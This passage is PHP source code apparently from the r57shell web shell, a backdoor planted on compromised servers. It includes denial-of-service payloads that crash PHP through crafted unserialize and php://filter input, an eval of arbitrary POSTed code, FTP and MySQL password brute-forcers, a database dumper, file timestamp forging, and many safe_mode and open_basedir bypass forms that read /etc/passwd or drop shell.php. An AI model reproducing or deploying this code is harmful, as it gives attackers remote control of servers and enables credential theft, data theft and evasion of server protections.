1796 if (@msg_receive ($msg_id,1,$msg_type,0xffffffff,$_SESSION,false,0,$msg_error)) { echo "$msg\n";
1797 }else {echo "Received $msg_error fetching message\n";
1798break;
1799} @msg_remove_queue ($msg_id);
1800 break;
1801 case 'dos19': $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd";
1802@fopen($url,"r");
1803 break;
1804 case 'dos20': $hashtable = str_repeat("A",39);
1805 $hashtable[5*4+0]=chr(0x58);
1806$hashtable[5*4+1]=chr(0x40);
1807$hashtable[5*4+2]=chr(0x06);
1808$hashtable[5*4+3]=chr(0x08);
1809 $hashtable[8*4+0]=chr(0x66);
1810$hashtable[8*4+1]=chr(0x77);
1811$hashtable[8*4+2]=chr(0x88);
1812$hashtable[8*4+3]=chr(0x99);
1813 $str = 'a:100000:{s:8:"AAAABBBB";
1814a:3:{s:12:"0123456789AA";
1815a:1:{s:12:"AAAABBBBCCCC";
1816i:0;
1817}s:12:"012345678AAA";
1818i:0;
1819s:12:"012345678BAN";
1820i:0;
1821}';
1822 for ($i=0;
1823$i<65535;
1824$i++) {$str .= 'i:0;
1825R:2;
1826';
1827} $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
1828s:39:"'.$hashtable.'";
1829i:0;
1830R:3;
1831';
1832 @unserialize($str);
1833 break;
1834 } if ($_POST['cmd']=="php_eval"){ $eval = @str_replace("<?php","",$_POST['php_eval']);
1835 $eval = @str_replace("?>","",$eval);
1836 @eval($eval);
1837} if ($_POST['cmd']=="ftp_brute") { $suc = 0;
1838 if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10);
1839 if(@ftp_login($connection,$user,$user)) {echo "[+] $user:$user - success\r\n";
1840$suc++;
1841} else if(isset($_POST['reverse'])) {if(@ftp_login($connection,$user,strrev($user))) {echo "[+] $user:".strrev($user)." - success\r\n";
1842$suc++;
1843}} @ftp_close($connection);
1844 } }else if(($_POST['brute_method']=='dic') &&isset($_POST['ftp_login'])){ foreach($users as $user) { $connection = @ftp_connect($ftp_server,$ftp_port,10);
1845 if(@ftp_login($connection,$_POST['ftp_login'],$user)) {echo "[+] ".$_POST['ftp_login'].":$user - success\r\n";
1846$suc++;
1847} @ftp_close($connection);
1848 } } echo "\r\n-------------------------------------\r\n";
1849 $count = count($users);
1850 if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;
1851} echo $lang[$language.'_text97'].$count."\r\n";
1852 echo $lang[$language.'_text98'].$suc."\r\n";
1853 } if ($_POST['cmd']=="db_brute") { $suc = 0;
1854 if($_POST['brute_method']=='passwd'){ foreach($users as $user) { $sql = new my_sql();
1855 $sql->db = $_POST['db'];
1856 $sql->host = $_POST['db_server'];
1857 $sql->port = $_POST['db_port'];
1858 $sql->user = $user;
1859 $sql->pass = $user;
1860 if($sql->connect()) {echo "[+] $user:$user - success\r\n";
1861$suc++;
1862} } if(isset($_POST['reverse'])) { foreach($users as $user) { $sql = new my_sql();
1863 $sql->db = $_POST['db'];
1864 $sql->host = $_POST['db_server'];
1865 $sql->port = $_POST['db_port'];
1866 $sql->user = $user;
1867 $sql->pass = strrev($user);
1868 if($sql->connect()) {echo "[+] $user:".strrev($user)." - success\r\n";
1869$suc++;
1870} } } }else if(($_POST['brute_method']=='dic') &&isset($_POST['mysql_l'])){ foreach($users as $user) { $sql = new my_sql();
1871 $sql->db = $_POST['db'];
1872 $sql->host = $_POST['db_server'];
1873 $sql->port = $_POST['db_port'];
1874 $sql->user = $_POST['mysql_l'];
1875 $sql->pass = $user;
1876 if($sql->connect()) {echo "[+] ".$_POST['mysql_l'].":$user - success\r\n";
1877$suc++;
1878} } } echo "\r\n-------------------------------------\r\n";
1879 $count = count($users);
1880 if(isset($_POST['reverse']) &&($_POST['brute_method']=='passwd')) {$count *= 2;
1881} echo $lang[$language.'_text97'].$count."\r\n";
1882 echo $lang[$language.'_text98'].$suc."\r\n";
1883 } if ($_POST['cmd']=="mysql_dump") { if(isset($_POST['dif'])) {$fp = @fopen($_POST['dif_name'],"w");
1884} $sql = new my_sql();
1885 $sql->db = $_POST['db'];
1886 $sql->host = $_POST['db_server'];
1887 $sql->port = $_POST['db_port'];
1888 $sql->user = $_POST['mysql_l'];
1889 $sql->pass = $_POST['mysql_p'];
1890 $sql->base = $_POST['mysql_db'];
1891 if(!$sql->connect()) {echo "[-] ERROR! Can't connect to SQL server";
1892} else if(!$sql->select_db()) {echo "[-] ERROR! Can't select database";
1893} else if(!$sql->dump($_POST['mysql_tbl'])) {echo "[-] ERROR! Can't create dump";
1894} else { if(empty($_POST['dif'])) {foreach($sql->dump as $v) echo $v."\r\n";
1895} else if($fp ||@function_exists('file_put_contents')){foreach($sql->dump as $v){@fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");
1896}} else {echo "[-] ERROR! Can't write in dump file";
1897} } } echo "</textarea></div>";
1898 echo "</b>";
1899 echo "</td></tr></table>";
1900 echo "<table width=100% cellpadding=0 cellspacing=0>";
1901 function div_title($title,$id) { return '<a style="cursor: pointer;
1902" onClick="change_divst(\''.$id.'\');
1903">'.$title.'</a>';
1904 } function div($id) { if(isset($_COOKIE[$id]) &&($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;
1905">';
1906 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
1907 if(empty($_COOKIE[$id]) &&@in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;
1908">';
1909 return '<div id="'.$id.'">';
1910 } if(!$safe_mode){ echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
1911 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
1912 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
1913 echo $te.'</div>'.$table_end1.$fe;
1914 } else{ echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
1915 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
1916 echo $te.'</div>'.$table_end1.$fe;
1917 } echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
1918 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
1919 echo $te.'</div>'.$table_end1.$fe;
1920 if($safe_mode ||$open_basedir){ echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
1921 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
1922 echo $te.'</div>'.$table_end1.$fe;
1923 } if($unix &&@function_exists('touch')){ echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
1924 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php"))) .ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>" .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
1925 echo sr(15,"<b> or set Day".$arrow."</b>", '
1926<select name="day" size="1">
1927<option value="01">1</option>
1928<option value="02">2</option>
1929<option value="03">3</option>
1930<option value="04">4</option>
1931<option value="05">5</option>
1932<option value="06">6</option>
1933<option value="07">7</option>
1934<option value="08">8</option>
1935<option value="09">9</option>
1936<option value="10">10</option>
1937<option value="11">11</option>
1938<option value="12">12</option>
1939<option value="13">13</option>
1940<option value="14">14</option>
1941<option value="15">15</option>
1942<option value="16">16</option>
1943<option value="17">17</option>
1944<option value="18">18</option>
1945<option value="19">19</option>
1946<option value="20">20</option>
1947<option value="21">21</option>
1948<option value="22">22</option>
1949<option value="23">23</option>
1950<option value="24">24</option>
1951<option value="25">25</option>
1952<option value="26">26</option>
1953<option value="27">27</option>
1954<option value="28">28</option>
1955<option value="29">29</option>
1956<option value="30">30</option>
1957<option value="31">31</option>
1958</select>' .ws(4)."<b>Month".$arrow."</b>" .'
1959<select name="month" size="1">
1960<option value="January">January</option>
1961<option value="February">February</option>
1962<option value="March">March</option>
1963<option value="April">April</option>
1964<option value="May">May</option>
1965<option value="June">June</option>
1966<option value="July">July</option>
1967<option value="August">August</option>
1968<option value="September">September</option>
1969<option value="October">October</option>
1970<option value="November">November</option>
1971<option value="December">December</option>
1972</select>' .ws(4)."<b>Year".$arrow."</b>" .'
1973<select name="year" size="1">
1974<option value="1998">1998</option>
1975<option value="1999">1999</option>
1976<option value="2000">2000</option>
1977<option value="2001">2001</option>
1978<option value="2002">2002</option>
1979<option value="2003">2003</option>
1980<option value="2004">2004</option>
1981<option value="2005">2005</option>
1982<option value="2006">2006</option>
1983<option value="2006">2007</option>
1984<option value="2006">2008</option>
1985<option value="2006">2009</option>
1986<option value="2006">2010</option>
1987</select>' .ws(4)."<b>Hour".$arrow."</b>" .'
1988<select name="chasi" size="1">
1989<option value="01">01</option>
1990<option value="02">02</option>
1991<option value="03">03</option>
1992<option value="04">04</option>
1993<option value="05">05</option>
1994<option value="06">06</option>
1995<option value="07">07</option>
1996<option value="08">08</option>
1997<option value="09">09</option>
1998<option value="10">10</option>
1999<option value="11">11</option>
2000<option value="12">12</option>
2001<option value="13">13</option>
2002<option value="14">14</option>
2003<option value="15">15</option>
2004<option value="16">16</option>
2005<option value="17">17</option>
2006<option value="18">18</option>
2007<option value="19">19</option>
2008<option value="20">20</option>
2009<option value="21">21</option>
2010<option value="22">22</option>
2011<option value="23">23</option>
2012<option value="24">24</option>
2013</select>' .ws(4)."<b>Minute".$arrow."</b>" .'
2014<select name="minutes" size="1">
2015<option value="01">1</option>
2016<option value="02">2</option>
2017<option value="03">3</option>
2018<option value="04">4</option>
2019<option value="05">5</option>
2020<option value="06">6</option>
2021<option value="07">7</option>
2022<option value="08">8</option>
2023<option value="09">9</option>
2024<option value="10">10</option>
2025<option value="11">11</option>
2026<option value="12">12</option>
2027<option value="13">13</option>
2028<option value="14">14</option>
2029<option value="15">15</option>
2030<option value="16">16</option>
2031<option value="17">17</option>
2032<option value="18">18</option>
2033<option value="19">19</option>
2034<option value="20">20</option>
2035<option value="21">21</option>
2036<option value="22">22</option>
2037<option value="23">23</option>
2038<option value="24">24</option>
2039<option value="25">25</option>
2040<option value="26">26</option>
2041<option value="27">27</option>
2042<option value="28">28</option>
2043<option value="29">29</option>
2044<option value="30">30</option>
2045<option value="31">31</option>
2046<option value="32">32</option>
2047<option value="33">33</option>
2048<option value="34">34</option>
2049<option value="35">35</option>
2050<option value="36">36</option>
2051<option value="37">37</option>
2052<option value="38">38</option>
2053<option value="39">39</option>
2054<option value="40">40</option>
2055<option value="41">41</option>
2056<option value="42">42</option>
2057<option value="43">43</option>
2058<option value="44">44</option>
2059<option value="45">45</option>
2060<option value="46">46</option>
2061<option value="47">47</option>
2062<option value="48">48</option>
2063<option value="49">49</option>
2064<option value="50">50</option>
2065<option value="51">51</option>
2066<option value="52">52</option>
2067<option value="53">53</option>
2068<option value="54">54</option>
2069<option value="55">55</option>
2070<option value="56">56</option>
2071<option value="57">57</option>
2072<option value="58">58</option>
2073<option value="59">59</option>
2074</select>' .ws(4)."<b>Second".$arrow."</b>" .'
2075<select name="second" size="1">
2076<option value="01">1</option>
2077<option value="02">2</option>
2078<option value="03">3</option>
2079<option value="04">4</option>
2080<option value="05">5</option>
2081<option value="06">6</option>
2082<option value="07">7</option>
2083<option value="08">8</option>
2084<option value="09">9</option>
2085<option value="10">10</option>
2086<option value="11">11</option>
2087<option value="12">12</option>
2088<option value="13">13</option>
2089<option value="14">14</option>
2090<option value="15">15</option>
2091<option value="16">16</option>
2092<option value="17">17</option>
2093<option value="18">18</option>
2094<option value="19">19</option>
2095<option value="20">20</option>
2096<option value="21">21</option>
2097<option value="22">22</option>
2098<option value="23">23</option>
2099<option value="24">24</option>
2100<option value="25">25</option>
2101<option value="26">26</option>
2102<option value="27">27</option>
2103<option value="28">28</option>
2104<option value="29">29</option>
2105<option value="30">30</option>
2106<option value="31">31</option>
2107<option value="32">32</option>
2108<option value="33">33</option>
2109<option value="34">34</option>
2110<option value="35">35</option>
2111<option value="36">36</option>
2112<option value="37">37</option>
2113<option value="38">38</option>
2114<option value="39">39</option>
2115<option value="40">40</option>
2116<option value="41">41</option>
2117<option value="42">42</option>
2118<option value="43">43</option>
2119<option value="44">44</option>
2120<option value="45">45</option>
2121<option value="46">46</option>
2122<option value="47">47</option>
2123<option value="48">48</option>
2124<option value="49">49</option>
2125<option value="50">50</option>
2126<option value="51">51</option>
2127<option value="52">52</option>
2128<option value="53">53</option>
2129<option value="54">54</option>
2130<option value="55">55</option>
2131<option value="56">56</option>
2132<option value="57">57</option>
2133<option value="58">58</option>
2134<option value="59">59</option>
2135</select>' .in('hidden','cmd',0,'touch') .in('hidden','dir',0,$dir) .ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2136 echo $te.'</div>'.$table_end1.$fe;
2137 } $select='';
2138 if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";
2139} if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";
2140} if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";
2141} if($unix &&$select){ echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
2142 echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2143 echo $te.'</div>'.$table_end1.$fe;
2144 } if(!$safe_mode){ $aliases2 = '';
2145 foreach ($aliases as $alias_name=>$alias_cmd) { $aliases2 .= "<option>$alias_name</option>";
2146 } echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
2147 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2148 echo $te.'</div>'.$table_end1.$fe;
2149 } echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
2150 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2151 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;
2152/home;
2153/tmp )");
2154 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;
2155.php')."* ( .txt;
2156.php;
2157.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2158 echo $te.'</div>'.$table_end1.$fe;
2159 if(!$safe_mode &&$unix){ echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
2160 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2161 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;
2162/home;
2163/tmp )");
2164 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2165 echo $te.'</div>'.$table_end1.$fe;
2166 } echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
2167 echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
2168 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");
2169\r\n//readfile(\"/etc/passwd\");
2170\r\n//file_get_content(\"/etc/passwd\");
2171"));
2172 echo "</textarea>";
2173 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2174 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2175 echo "</div></div></font>";
2176 echo $table_end1.$fe;
2177 if($safe_mode ||$open_basedir) { echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
2178 echo "<table class=table1 width=100% align=center>";
2179 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2180 echo $te.'</div>'.$table_end1.$fe;
2181 } if(($safe_mode ||$open_basedir) &&$curl_on &&@version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
2182 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2183 echo $te.'</div>'.$table_end1.$fe;
2184 } if(($safe_mode ||$open_basedir) &&$mysql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
2185 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2186 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2187 echo $te.'</div>'.$table_end1.$fe;
2188 } if(($safe_mode ||$open_basedir) &&$mssql_on) { echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
2189 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2190 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2191 echo $te.'</div>'.$table_end1.$fe;
2192 } if(($safe_mode ||$open_basedir) &&$unix &&@function_exists('mb_send_mail') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
2193 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2194 echo $te.'</div>'.$table_end1.$fe;
2195 } if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_list') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
2196 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2197 echo $te.'</div>'.$table_end1.$fe;
2198 } if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_body') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
2199 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2200 echo $te.'</div>'.$table_end1.$fe;
2201 } if(($safe_mode ||$open_basedir) &&@function_exists('copy') &&@version_compare(@phpversion(),"5.2.0")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
2202 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
2203 echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2204 echo $te.'</div>'.$table_end1.$fe;
2205 } if(($safe_mode ||$open_basedir) &&@function_exists('ini_restore') &&@version_compare(@phpversion(),"5.2.0")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
2206 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2207 echo $te.'</div>'.$table_end1.$fe;
2208 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.0.0")<0){ echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
2209 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2210 echo $te.'</div>'.$table_end1.$fe;
2211 } if(($safe_mode ||$open_basedir) &&@function_exists('glob') &&@version_compare(@phpversion(),"5.2.2")<=0){ echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
2212 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2213 echo $te.'</div>'.$table_end1.$fe;
2214 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
2215 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2216 echo $te.'</div>'.$table_end1.$fe;
2217 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
2218 echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2219 echo $te.'</div>'.$table_end1.$fe;
2220 } if(($safe_mode ||$open_basedir) &&@function_exists('error_log') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
2221 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
2222 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<?php phpinfo();
2223 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2224 echo $te.'</div>'.$table_end1.$fe;
2225 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
2226 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
2227 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<?php phpinfo();
2228 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2229 echo $te.'</div>'.$table_end1.$fe;
2230 } if(($safe_mode ||$open_basedir) &&@function_exists('readfile') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
2231 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
2232 echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<?php phpinfo();
2233 ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
2234 echo $te.'</div>'.$table_end1.$fe;
2235 } if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.4")<=0) { echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
2236 echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2237 echo $te.'</div>'.$table_end1.$fe;
2238 } if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
2239 echo "<tr><td valign=top width=70%>".$ts;
2240 echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
2241 echo $te."</td><td valign=top width=30%>".$ts;
2242 echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
2243 echo $te."</td></tr>";
2244 echo $te.'</div>'.$table_end1;
2245 } if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0) { echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
